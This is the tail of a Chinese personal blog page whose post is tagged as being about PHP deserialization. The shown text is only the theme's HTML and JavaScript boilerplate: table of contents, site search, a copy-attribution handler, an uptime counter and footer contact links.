                                <i class="far fa-clock fa-fw icon-date"></i>2022-09-29
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/jcxj/categories/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="post-category">
                                    反序列化
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/jcxj/tags/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                        <span class="chip bg-color">php反序列化</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + 'From: Made by jcxj<br />'
            + 'Author: jcxj<br />'
            + 'Link: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归jcxj所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/jcxj/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->


<!-- 代码块复制 -->

<script type="text/javascript" src="/jcxj/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/jcxj/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/jcxj/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2022</span>
            
            <span id="year">2022</span>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">26.1k</span>&nbsp;字
            
            
            
            
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2022";
                    var startMonth = "09";
                    var startDate = "20";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link ">
    <a href="https://github.com/jcxj/jcxj" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:971748776@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=971748776" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 971748776" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/jcxj/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/jcxj/libs/materialize/materialize.min.js"></script>
    <script src="/jcxj/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/jcxj/libs/aos/aos.js"></script>
    <script src="/jcxj/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/jcxj/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/jcxj/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/jcxj/libs/others/clicklove.js" async="async"></script>
    
    

    

    

	
    

    

    

    
    <script src="/jcxj/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
<script type="text/javascript"> var OriginTitile = document.title, st;
document.addEventListener("visibilitychange", function () { document.hidden ? (document.title = "问题没解决?", clearTimeout(st)) : (document.title = "Made by jcxj", st = setTimeout(function () { document.title = OriginTitile }, 3e3)) }) </script>

